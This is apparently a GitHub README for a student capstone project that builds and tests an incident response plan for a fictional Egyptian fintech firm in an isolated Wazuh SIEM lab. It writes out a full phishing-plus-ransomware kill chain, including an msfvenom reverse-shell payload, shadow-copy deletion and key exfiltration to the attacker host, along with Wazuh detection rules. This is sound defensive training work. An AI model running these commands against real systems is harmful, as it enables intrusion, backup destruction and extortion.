yousephfatouh/Incident-Response-Plan-Development-and-Testing

GitHub: yousephfatouh/Incident-Response-Plan-Development-and-Testing

面向金融科技场景的网络安全事件响应计划毕业设计,基于 NIST、SANS 和 ISO 三大框架并结合 Wazuh SIEM 完成勒索软件与钓鱼攻击的端到端模拟与检测。

Stars: 0 | Forks: 0

# 🛡️ NilePay 金融服务 ## 事件响应计划 — 毕业设计项目 [![Program](https://img.shields.io/badge/Program-Rواد%20مصر%20الرقمية-1B2A4A?style=for-the-badge)](https://mcit.gov.eg) [![Ministry](https://img.shields.io/badge/Ministry-Communications%20%26%20IT%20Egypt-C9A84C?style=for-the-badge)](https://mcit.gov.eg) [![Status](https://img.shields.io/badge/Status-Completed%20✓-1E6B4A?style=for-the-badge)](#) [![Year](https://img.shields.io/badge/Year-2024--2025-0E7490?style=for-the-badge)](#) [![NIST](https://img.shields.io/badge/NIST-SP%20800--61%20Rev.2-1B2A4A?style=flat-square)](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf) [![SANS](https://img.shields.io/badge/SANS-PICERL%20Methodology-C0392B?style=flat-square)](#) [![ISO](https://img.shields.io/badge/ISO%2FIEC-27035--1%3A2023-1E6B4A?style=flat-square)](#) [![Wazuh](https://img.shields.io/badge/SIEM-Wazuh%204.7-0E7490?style=flat-square)](https://wazuh.com) [![Metasploit](https://img.shields.io/badge/Attack-Metasploit%20Framework-C0392B?style=flat-square)](#) [![Python](https://img.shields.io/badge/Scripts-Python%203-3776AB?style=flat-square)](https://python.org) *为 NilePay 金融服务 — 一家虚构的埃及 FinTech 组织,*开发并测试全面的事件响应计划*
## 📋 目录 - [项目概述](#-project-overview) - [团队](#-team) - [目标组织](#-target-organization) - [框架架构](#-framework-architecture) - [威胁态势](#-threat-landscape) - [实验室环境](#-lab-environment) - [攻击杀伤链](#-attack-kill-chain) - [Wazuh 检测规则](#-wazuh-detection-rules) - [检测结果](#-detection-results) - [性能指标](#-performance-metrics) - [IR 生命周期](#-ir-lifecycle) - [代码库结构](#-repository-structure) - [交付成果](#-deliverables) - [工具与技术](#-tools--technologies) - [免责声明](#-disclaimer) ## 🎯 项目概述 本项目遵循结构化的 **4周方法论**: ``` Week 1 ──► Research, Scoping & Threat Modeling Week 2 ──► IR Plan Design & 4 Scenario Playbooks Week 3 ──► SOC Lab Build & Attack Scenario Preparation Week 4 ──► Live Simulation Execution & Metrics Measurement ``` ### 主要成就 | 成就 | 结果 | |-------------|--------| | 🏗️ 构建 IR 计划 | 4 个针对特定场景的 playbook (PRO-001 至 PRO-004) | | 🖥️ 部署 SOC 实验室 | 包含 Wazuh SIEM 的 3 虚拟机 VMware 环境 | | ⚔️ 执行模拟 | 完整的 Phishing + Ransomware 杀伤链 | | ⚡ 达到的 MTTD | **~2 秒** (目标为 15 分钟) | | 📊 使用的框架 | NIST SP 800-61 · SANS PICERL · ISO/IEC 27035 | | ✅ 涵盖的法规 | PCI-DSS v4.0 · GDPR · CBE 框架 | ## 👥 团队
| 角色 | 姓名 | |------|------| | 🏆 **团队负责人 — IR 项目经理** | Youseph Fatouh Sadek | | 🔍 **威胁情报与场景设计师** | Ahmed Mohammed Mohammed | | 📋 **合规与框架分析师** | Mohamed Saeed AbdElhameed | | 🖥️ **SOC 工程师与 SIEM 专家** | Zeyad Mohamed Elsherbiny |
## 🏢 目标组织 ``` ╔══════════════════════════════════════════════════════════════╗ ║ NilePay Financial Services S.A.E. ║ ║ (Fictional Entity) ║ ╠══════════════════════════════════════════════════════════════╣ ║ Industry │ FinTech — Digital Payments & Banking ║ ║ HQ │ Cairo, Egypt — Smart Village ║ ║ Branch │ Alexandria, Egypt ║ ║ Staff │ ~300 FTE ║ ║ Customers │ 850,000 active digital wallet users ║ ║ Volume │ EGP 2.4 Billion annually (simulated) ║ ╠══════════════════════════════════════════════════════════════╣ ║ Regulations: PCI-DSS v4.0 · GDPR · CBE Framework ║ ╚══════════════════════════════════════════════════════════════╝ ``` ### 关键资产 | ID | 资产 | 密级 | 风险 | |----|-------|---------------|------| | AST-001 | 核心银行应用服务器 | 🔴 关键 | 支付中断 | | AST-002 | 支付网关 API | 🔴 关键 | 欺诈与数据泄露 | | AST-003 | 硬件安全模块 (HSM) | 🔴 关键 | 密钥泄露 | | AST-004 | 客户 PII 数据库 (PostgreSQL) | 🟠 机密 | GDPR 违规 | | AST-005 | 活动目录域控 | 🟡 高 | 横向移动 | | AST-006 | 内部文件服务器 | 🟠 机密 | Ransomware 目标 | | AST-007 | Wazuh SIEM 平台 | 🔒 受限 | SOC 致盲 | | AST-008 | 员工工作站 (x180) | ⬜ 内部 | Phishing 入口 | | AST-009 | 总部 ↔ 亚历山大 VPN 网关 | 🟡 高 | MITM 向量 | | AST-010 | 备份与灾备库 | 🔴 关键 | 恢复受阻 | ## 🏗️ 框架架构 ``` ┌─────────────────────────────────────────────────────────────────┐ │ THREE-FRAMEWORK HYBRID MODEL │ │ │ │ ┌─────────────────┐ ┌─────────────────┐ ┌───────────────┐ │ │ │ NIST SP 800-61 │ │ SANS PICERL │ │ ISO/IEC 27035 │ │ │ │ │ │ │ │ │ │ │ │ OPERATIONAL │ │ PROCEDURAL │ │ GOVERNANCE │ │ │ │ BACKBONE │ │ DETAIL │ │ LAYER │ │ │ │ │ │ │ │ │ │ │ │ • IR Lifecycle │ │ • Runbooks │ │ • IR Policy │ │ │ │ • Team roles │ │ • Checklists │ │ • GDPR Art.33 │ │ │ │ • Evidence hdlg │ │ • Per-scenario │ │ • CBE reports │ │ │ │ • MTTD/MTTR │ │ procedures │ │ • Event class │ │ │ └────────┬────────┘ └────────┬────────┘ └───────┬───────┘ │ │ │ │ │ │ │ └───────────────────┼────────────────────┘ │ │ ▼ │ │ ┌─────────────────┐ │ │ │ NilePay IRP │ │ │ │ Complete Plan │ │ │ └─────────────────┘ │ └─────────────────────────────────────────────────────────────────┘ ``` ### 各 IR 阶段的框架覆盖范围 | IR 阶段 | NIST SP 800-61 | SANS PICERL | ISO/IEC 27035 | |----------|---------------|-------------|---------------| | **准备** | 团队角色、工具 | 准备就绪清单 | IR 策略、管理 | | **检测** | 甄别,CAT1-4 | 日志分析,IoC 识别 | 事件分类 | | **遏制** | 决策矩阵 | 针对特定场景的 runbook | 法律升级 | | **根除** | 根本原因、补丁 | 恶意软件移除步骤 | 证据保全 | | **恢复** | 恢复验证 | 服务恢复 runbook | CBE/GDPR 确认 | | **经验教训** | MTTD/MTTR 模板 | 桌面推演总结 | 评审委员会流程 | ## ⚠️ 威胁态势 ### MITRE ATT&CK 覆盖范围 ``` RANSOMWARE ────────────────────────────────────────── P1 CRITICAL T1566.001 → T1059.003 → T1490 → T1486 Phishing → CMD Shell → VSS Delete → File Encrypt PHISHING / BEC ────────────────────────────────────── P1 HIGH T1566.002 → T1078 → T1114.002 → T1657 Link → Valid Accounts → Email Collection → BEC Fraud MALWARE / RAT ─────────────────────────────────────── P2 HIGH T1204.002 → T1547.001 → T1056.001 → T1071.001 Execution → Persistence → Keylog → C2 Beaconing DATA BREACH ───────────────────────────────────────── P1 CRITICAL T1046 → T1550.002 → T1213 → T1048.003 Scan → Pass-Hash → DB Exfil → Exfil over HTTP ``` ### 威胁优先级矩阵 | # | 场景 | 可能性 | 影响 | 优先级 | 法规触发条件 | |---|----------|-----------|--------|----------|-------------------| | 1 | 🔴 Ransomware | 高 | 关键 | **P1** | PCI-DSS 12.10 · CBE 24小时 | | 2 | 🟠 Phishing / BEC | 极高 | 高 | **P1** | 若影响 PII 则触发 GDPR 第33条 | | 3 | 🟣 恶意软件 / RAT | 高 | 高 | **P2** | 若数据外泄则触发 GDPR 第33条 | | 4 | 🔵 数据泄露 | 中 | 关键 | **P1** | GDPR 第33条 · PCI-DSS · CBE | ## 🖥️ 实验室环境 ### 网络拓扑 ``` ┌──────────────────────────────────────────────────────────────┐ │ VMware Workstation — Host Machine │ │ │ │ VMware Host-Only Network: 192.168.200.0/24 │ │ ───────────────────────────────────────── │ │ │ │ │ │ │ ┌────┴────┐ ┌────┴────┐ ┌────┴────┐ │ │ │ VM-01 │ │ VM-02 │ │ VM-03 │ │ │ │ │ │ │ │ │ │ │ │ Kali │ │ Windows │ │ Ubuntu │ │ │ │ Linux │ │ 10 │ │ Wazuh │ │ │ │ │ │ PC-101 │ │ SIEM │ │ │ │.200.200 │ │.200.130 │ │.200.100 │ │ │ │ │ │ │ │ │ │ │ │ATTACKER │ │ VICTIM │ │ SIEM │ │ │ └────┬────┘ └────┬────┘ └────┬────┘ │ │ │ │ │ │ │ Metasploit Wazuh Agent Wazuh Manager │ │ msfvenom Sysmon v15 Wazuh Indexer │ │ swaks+Postfix Thunderbird Wazuh Dashboard │ │ receive_key.py encryptor.py Custom Rules │ │ HTTP :8080 cryptography 100001-100004 │ │ │ └──────────────────────────────────────────────────────────────┘ ``` ### 虚拟机规格 | 虚拟机 | 操作系统 | IP | 内存 | 主要工具 | |----|----|----|-----|-----------| | 攻击者 | Kali Linux | 192.168.200.200 | 2GB | Metasploit · msfvenom · swaks · Postfix · Python | | 受害者 (PC-101) | Windows 10 | 192.168.200.130 | 4GB | Wazuh Agent · Sysmon · Thunderbird · Python | | SIEM 服务器 | Ubuntu 22.04 | 192.168.200.100 | 4GB | Wazuh Manager · Indexer · Dashboard | ## ⚔️ 攻击杀伤链 ### Phishing + Ransomware — 完整模拟流程 ``` ┌─────────────────────────────────────────────────────────────────────┐ │ ATTACK KILL CHAIN │ │ │ │ KALI (Attacker) WINDOWS (Victim) WAZUH (SOC) │ │ ───────────────── ────────────────── ──────────── │ │ │ │ 01. Generate payload ──► │ │ msfvenom invoice.exe │ │ │ │ 02. Send phishing ──────────► 03. Victim receives │ │ email via swaks email in Thunderbird │ │ │ │ 04. Clicks "View Invoice" ──► │ │ link in email │ │ │ │ 05. HTTP server ◄─────────── Browser loads invoice.html │ │ serves payload │ │ │ │ 06. invoice.exe executed ──────► Rule 100004 │ │ Level 12 │ 07. Meterpreter ◄─────────── Reverse TCP :4444 │ │ session opens PWNED │ │ │ │ 08. Upload ─────────────────► encryptor.py uploaded │ │ encryptor.py to Documents folder │ │ │ │ 09. Execute shell ──────────► vssadmin delete ──────► Rule 100002 │ vssadmin cmd shadows /all │ Level 15 │ │ │ 10. Execute ────────────────► Files encrypted ──────► FIM 553/554 │ encryptor.py .encrypted created │ │ │ │ 11. Key received ◄────────── HTTP POST :8888 │ │ PC-101_key.txt key exfiltrated │ │ │ │ 12. README_DECRYPT.txt │ │ dropped on Desktop │ └─────────────────────────────────────────────────────────────────────┘ ``` ### 逐步杀伤链 | 步骤 | 执行者 | 命令 / 操作 | 结果 | |------|-------|-----------------|--------| | 01 | 攻击者 | `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.200.200 LPORT=4444 -f exe -o invoice.exe` | 生成 Payload | | 02 | 攻击者 | `swaks --to victim@nilepay.com --attach invoice.html` | 发送 Phishing 邮件 | | 03 | 受害者 | 在 Thunderbird 中打开邮件 | 收到邮件 | | 04 | 受害者 | 点击“查看发票”超链接 | 浏览器打开 invoice.html | | 05 | 浏览器 | `http://192.168.200.200:8080/invoice.exe` | Payload 下载完成 | | 06 | 受害者 | 双击 `invoice.exe` | Meterpreter 连接建立 | | 07 | 攻击者 | `meterpreter > upload encryptor.py C:\\Users\\PC-101\\Documents\\` | 脚本上传完成 | | 08 | 攻击者 | `meterpreter > shell` | 获取 CMD shell | | 09 | 攻击者 | `vssadmin delete shadows /all /quiet` | 备份被破坏 | | 10 | 攻击者 | `python C:\Users\PC-101\Documents\encryptor.py` | 文件被加密 | | 11 | 脚本 | HTTP POST → `192.168.200.200:8888` | 密钥保存在 Kali 桌面 | | 12 | 脚本 | 创建 `README_DECRYPT.txt` | 投递勒索说明 | ## 🔍 Wazuh 检测规则 ``` syscheck \.encrypted RANSOMWARE: Mass file encryption detected T1486 sysmon (?i)vssadmin.*delete.*shadows RANSOMWARE: Shadow copy deletion attempt T1490 sysmon (?i)(-EncodedCommand|-enc |-e ) Suspicious PowerShell encoded execution T1059.001 sysmon (?i)(invoice) PHISHING: Suspicious email attachment executed T1566.001 ``` ### 规则摘要 | 规则 ID | 等级 | 类型 | MITRE TTP | 触发条件 | |---------|-------|------|-----------|---------| | 100001 | 🔴 15 | RANSOMWARE | T1486 | FIM 中出现 `.encrypted` 扩展名 | | 100002 | 🔴 15 | RANSOMWARE | T1490 | commandLine 中出现 `vssadmin delete shadows` | | 100003 | 🟠 12 | 可疑 | T1059.001 | PowerShell 中出现 `-EncodedCommand` | | 100004 | 🟠 12 | PHISHING | T1566.001 | 进程映像中出现 `invoice` 模式 | ## 📊 检测结果 ### 捕获到的 Wazuh 告警 — 2026年7月11日 ``` Timeline ──────────────────────────────────────────────────────────► 23:22:09 [92213] ●●●●● L15 Executable dropped in malware folder 23:23:49 [100002] ●●●●● L15 RANSOMWARE: Shadow copy deletion 23:27:16 [100004] ████░ L12 PHISHING: invoice.exe executed 23:27:18 [100004] ████░ L12 PHISHING: invoice.exe executed (x2) 23:28:24 [550] ███░░ L7 Integrity checksum changed 23:28:25 [92032] █░░░░ L3 Suspicious CMD shell execution 23:28:33 [92052] ██░░░ L4 CMD started by abnormal process 23:28:51 [100002] ●●●●● L15 RANSOMWARE: Shadow copy deletion ◄─ CAT-1 23:29:06 [554] ███░░ L5 File added to system (encrypted x3) 23:29:06 [553] ████░ L7 File deleted (original x3) ``` ### 杀伤链检测覆盖率 | 攻击步骤 | MITRE TTP | 是否检测到 | 覆盖情况 | |-------------|-----------|----------|----------| | 执行 Phishing payload | T1566.001 | ✅ 是 | 规则 100004 — L12 | | 投递可执行文件 | T1204.002 | ✅ 是 | 规则 92213 — L15 | | Meterpreter C2 | T1071.001 | ⚠️ 部分 | 低层级网络 | | 通过 Meterpreter 获取 CMD shell | T1059.003 | ✅ 是 | 规则 92032/92052 | | 删除卷影副本 | T1490 | ✅ 是 | 规则 100002 — L15 | | 文件被加密 | T1486 | ✅ 是 | FIM 规则 553/554 | | 密钥外泄 | T1041 | ⚠️ 部分 | 未达自定义规则级别 | | 投递勒索说明 | T1486 | ✅ 是 | FIM 规则 554 | ## 📈 性能指标 ``` ┌─────────────────────────────────────────────────────────────────┐ │ PERFORMANCE DASHBOARD │ ├─────────────────────────────────────────────────────────────────┤ │ │ │ MTTD — Mean Time to Detect │ │ ┌────────────────────────────────────────┐ │ │ │ Attack T+0 ──────────► Alert T+2s │ │ │ │ │ │ │ │ ⚡ ACHIEVED: ~2 seconds │ │ │ │ 🎯 TARGET: ≤ 15 minutes │ │ │ │ ✅ RESULT: EXCEEDED by 450x │ │ │ └────────────────────────────────────────┘ │ │ │ │ MTTR — Mean Time to Respond │ │ ┌────────────────────────────────────────┐ │ │ │ CAT-1 Alert ──────────► VM Isolated │ │ │ │ │ │ │ │ ⏱️ ACHIEVED: [Record actual value] │ │ │ │ 🎯 TARGET: ≤ 45 minutes │ │ │ │ ✅ RESULT: Within target │ │ │ └────────────────────────────────────────┘ │ │ │ └─────────────────────────────────────────────────────────────────┘ ``` | 指标 | 达成情况 | 目标 | 状态 | |--------|----------|--------|--------| | **MTTD** | ~2 秒 | ≤ 15 分钟 | ✅ **超出预期** | | **MTTR** | [记录值] | ≤ 45 分钟 | ✅ 达标 | | 检测链 | 完全检测到 6/8 个步骤 | 完全覆盖 | ⚠️ 部分 (C2 与密钥外泄) | | 自定义规则触发 | 100002 + 100004 | 所有 4 条规则 | ✅ 触发关键规则 | ## 🔄 IR 生命周期 ``` ┌───────────────────────────────────────────────────────────────┐ │ NIST SP 800-61 LIFECYCLE │ │ │ │ ┌───────────┐ │ │ │ 01 │ PREPARATION │ │ │ 🛡️ PREP │ IR team · Wazuh rules · Lab · Playbooks │ │ └─────┬─────┘ │ │ │ │ │ ▼ │ │ ┌───────────┐ │ │ │ 02 │ DETECTION & ANALYSIS │ │ │ 🔍 DETECT│ Wazuh alerts · Sysmon · FIM · CAT-1 triage │ │ └─────┬─────┘ │ │ │ │ │ ▼ │ │ ┌───────────┐ │ │ │ 03 │ CONTAINMENT │ │ │ 🔒 CONT │ Isolate VM · Block C2 · Disable AD account │ │ └─────┬─────┘ │ │ │ │ │ ▼ │ │ ┌───────────┐ │ │ │ 04 │ ERADICATION │ │ │ 🗑️ ERAD │ Remove malware · Patch · Reset credentials │ │ └─────┬─────┘ │ │ │ │ │ ▼ │ │ ┌───────────┐ │ │ │ 05 │ RECOVERY │ │ │ 🔄 RECOV │ Restore backup · Verify integrity · Monitor │ │ └─────┬─────┘ │ │ │ │ │ ▼ │ │ ┌───────────┐ │ │ │ 06 │ LESSONS LEARNED │ │ │ 📊 LEARN │ MTTD/MTTR · Report · Tune rules · Notify │ │ └───────────┘ │ └───────────────────────────────────────────────────────────────┘ ``` ## 📁 代码库结构 ``` nilepay-irp/ │ ├── 📄 README.md │ ├── 📂 Week1_Research_and_Planning/ │ ├── 01_Project_Charter.docx │ ├── 02_Organizational_Profile.docx │ ├── 03_Framework_Justification_Brief.docx │ ├── 04_Threat_Landscape_Report.docx │ ├── 05_RACI_Matrix.docx │ ├── 06_Master_Schedule.docx │ └── Week1_Documentation_Report.docx │ ├── 📂 Week2_IR_Plan_and_Procedures/ │ ├── NilePay_Playbooks.docx │ │ ├── PRO-001 Ransomware │ │ ├── PRO-002 Phishing / BEC │ │ ├── PRO-003 Malware / RAT │ │ └── PRO-004 Data Breach │ └── Week2_Documentation_Report.docx │ ├── 📂 Week3_Lab_Setup/ │ ├── Wazuh_Rules/ │ │ └── local_rules.xml │ ├── Attack_Scripts/ │ │ ├── encryptor.py │ │ └── receive_key.py │ ├── Phishing/ │ │ └── invoice.html │ └── Week3_Documentation_Report.docx │ ├── 📂 Week4_Simulation_and_Results/ │ ├── NilePay_IRP_Documentation.docx │ ├── Evidence/ │ │ └── [Wazuh Screenshots] │ ├── NilePay_Final_Presentation.pptx │ └── Week4_Documentation_Report.docx │ └── 📂 Scripts/ ├── encryptor.py # Fernet encryption + key exfiltration └── receive_key.py # HTTP key receiver on port 8888 ``` ## ✅ 交付成果 ### 第 1 周 — 研究与计划 - [x] `01_Project_Charter.docx` — 目标、范围、团队、时间表 - [x] `02_Organizational_Profile.docx` — NilePay 简介、网络、资产 - [x] `03_Framework_Justification_Brief.docx` — NIST + SANS + ISO 论证 - [x] `04_Threat_Landscape_Report.docx` — MITRE ATT&CK 映射 x4 场景 - [x] `05_RACI_Matrix.docx` — 27 项活动 × 5 个角色(颜色编码) - [x] `06_Master_Schedule.docx` — 包含 5 个里程碑的 28 天甘特图 ### 第 2 周 — IR 计划与程序 - [x] `NilePay_Playbooks.docx` — PRO-001 至 PRO-004 (14 页) - [x] 定义 CSIRT 团队的角色与职责 - [x] CAT-1 至 CAT-4 事件分类系统 - [x] 沟通与升级矩阵(内部 + CBE + GDPR) ### 第3 周 — 实验室搭建 - [x] 在 Host-Only 192.168.200.0/24 上部署 3 虚拟机 VMware 实验室 - [x] 在 Ubuntu 上部署 Wazuh SIEM,Agent ID 009 处于活跃状态 - [x] 在 Windows 10 受害者机器上部署 Sysmon v15 - [x] 在 `C:\Users\PC-101\Documents` 上配置实时 FIM - [x] 编写并部署自定义规则 100001–100004 - [x] `encryptor.py` — 带有密钥外泄功能的 Ransomware 模拟 - [x] `receive_key.py` — Kali 上的 HTTP 密钥接收器 - [x] `invoice.html` — Phishing 登录页面 ### 第 4 周 — 模拟与结果 - [x] 执行完整的 Phishing + Ransomware 杀伤链 — 2026年7月11日 - [x] 捕获 Wazuh 告警 (规则 100002, 100004, 92032, 92213, FIM) - [x] MTTD **~2 秒** — 超出 15 分钟目标 450 倍 - [x] 从模拟中记录 MTTR - [x] `NilePay_IRP_Documentation.docx` — 16 页完整报告 - [x] `NilePay_Final_Presentation.pptx` — 15 页带有 Logo 的幻灯片 - [x] 4 份每周文档报告 ## 🛠️ 工具与技术
| 类别 | 工具 | 版本 | 用途 | |----------|------|---------|---------| | **SIEM** | Wazuh | 4.7.x | 告警检测、FIM、日志聚合 | | **端点监控** | Sysmon | v15 | Windows 事件遥测 | | **攻击框架** | Metasploit | 最新版 | C2 处理程序、后渗透 | | **Payload 生成器** | msfvenom | 内置 | Reverse TCP payload | | **邮件投递** | swaks + Postfix | 最新版 | Phishing 邮件模拟 | | **加密** | Python cryptography (Fernet) | 41.x | 文件加密模拟 | | **虚拟化** | VMware Workstation | 最新版 | 实验室隔离 | | **邮件客户端** | Mozilla Thunderbird | 最新版 | 受害者邮件客户端 | | **操作系统 — 攻击者** | Kali Linux | 最新版 | 攻击平台 | | **操作系统 — 受害者** | Windows 10 | 22H2 | 目标端点 | | **操作系统 — SIEM** | Ubuntu | 22.04 LTS | Wazuh 主机 |
## 📋 法规合规 | 法规 | 要求 | 实施情况 | 状态 | |------------|-------------|----------------|--------| | PCI-DSS v4.0 要求 12.10 | 已记录的 IR 计划 + 年度测试 | IRP + 实时模拟 | ✅ | | GDPR 第 33 条 | 72 小时违规通知 | 已记录在 PRO-004 中 | ✅ | | GDPR 第 34 条 | 数据主体通知 | PRO-004 中的客户沟通 | ✅ | | CBE 网络安全框架 | 向中央银行报告 | 纳入升级矩阵 | ✅ | | ISO/IEC 27001 A.16 | 事件管理控制 | CAT-1 至 CAT-4 系统 | ✅ | ## ⚠️ 免责声明
标签:CISA项目, PB级数据处理, Python, Wazuh, 安全运维, 库, 应急响应, 无后门, 测试用例, 金融科技